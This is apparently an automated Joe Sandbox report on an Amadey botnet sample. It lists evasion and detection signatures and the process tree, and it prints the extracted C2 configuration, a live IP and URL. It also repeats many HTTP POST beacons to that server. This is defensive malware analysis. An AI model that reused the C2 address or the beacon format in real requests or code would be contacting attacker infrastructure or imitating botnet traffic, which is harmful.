Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
gNo9ad9KO4.exe

Overview

General Information

Sample name:gNo9ad9KO4.exe
renamed because original name is a hash value
Original sample name:c2197d56f08530af4a35733cda8cd2fd.exe
Analysis ID:1467935
MD5:c2197d56f08530af4a35733cda8cd2fd
SHA1:ef37d065f5ab7acbe071150de940778ad7e80bb5
SHA256:30eb98d8a7a54537b4352f78b44be53109f3cd82577fa0c9b378bde020e2890b
Tags:32exetrojan
Infos:

Detection

Amadey
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Drops PE files
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • gNo9ad9KO4.exe (PID: 7256 cmdline: "C:\Users\user\Desktop\gNo9ad9KO4.exe" MD5: C2197D56F08530AF4A35733CDA8CD2FD)
    • explorti.exe (PID: 7448 cmdline: "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" MD5: C2197D56F08530AF4A35733CDA8CD2FD)
  • explorti.exe (PID: 7564 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: C2197D56F08530AF4A35733CDA8CD2FD)
  • explorti.exe (PID: 8152 cmdline: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe MD5: C2197D56F08530AF4A35733CDA8CD2FD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.1640045336.0000000005280000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
    00000007.00000002.2881028373.0000000000E91000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
      00000001.00000003.1665651650.0000000004990000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000007.00000003.2319286062.0000000004810000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000002.00000002.1720834507.0000000000E91000.00000040.00000001.01000000.00000007.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            7.2.explorti.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0.2.gNo9ad9KO4.exe.160000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                1.2.explorti.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  2.2.explorti.exe.e90000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                    Sigma Signatures

                    No Sigma rule has matched

                    Snort Signatures

                    Timestamp:07/05/24-05:10:03.058996
                    SID:2856147
                    Source Port:49737
                    Destination Port:80
                    Protocol:TCP
                    Classtype:A Network Trojan was detected

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: gNo9ad9KO4.exeAvira: detected
                    Antivirus detection for URL or domain
                    Source: http://77.91.77.82/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                    Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpAvira URL Cloud: Label: phishing
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                    Found malware configuration
                    Source: explorti.exe.8152.7.memstrminMalware Configuration Extractor: Amadey {"C2 url": ["http://77.91.77.82/Hun4Ko/index.php", "http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php"]}
                    Multi AV Scanner detection for domain / URL
                    Source: http://77.91.77.82/Hun4Ko/index.phpMVirustotal: Detection: 22%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpTVirustotal: Detection: 22%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpCVirustotal: Detection: 23%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpVirustotal: Detection: 24%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpaVirustotal: Detection: 21%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpkVirustotal: Detection: 21%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpWVirustotal: Detection: 21%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpVirustotal: Detection: 22%Perma Link
                    Source: http://77.91.77.82/Hun4Ko/index.phpuVirustotal: Detection: 21%Perma Link
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeVirustotal: Detection: 51%Perma Link
                    Multi AV Scanner detection for submitted file
                    Source: gNo9ad9KO4.exeVirustotal: Detection: 51%Perma Link
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: gNo9ad9KO4.exeJoe Sandbox ML: detected
                    Source: gNo9ad9KO4.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

                    Networking

                    barindex
                    Snort IDS alert for network traffic
                    Source: TrafficSnort IDS: 2856147 ETPRO TROJAN Amadey CnC Activity M3 192.168.2.4:49737 -> 77.91.77.82:80
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorIPs: 77.91.77.82
                    Source: Malware configuration extractorIPs: 77.91.77.82
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 45 42 35 32 45 37 35 42 34 35 44 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7EB52E75B45D82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                    Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
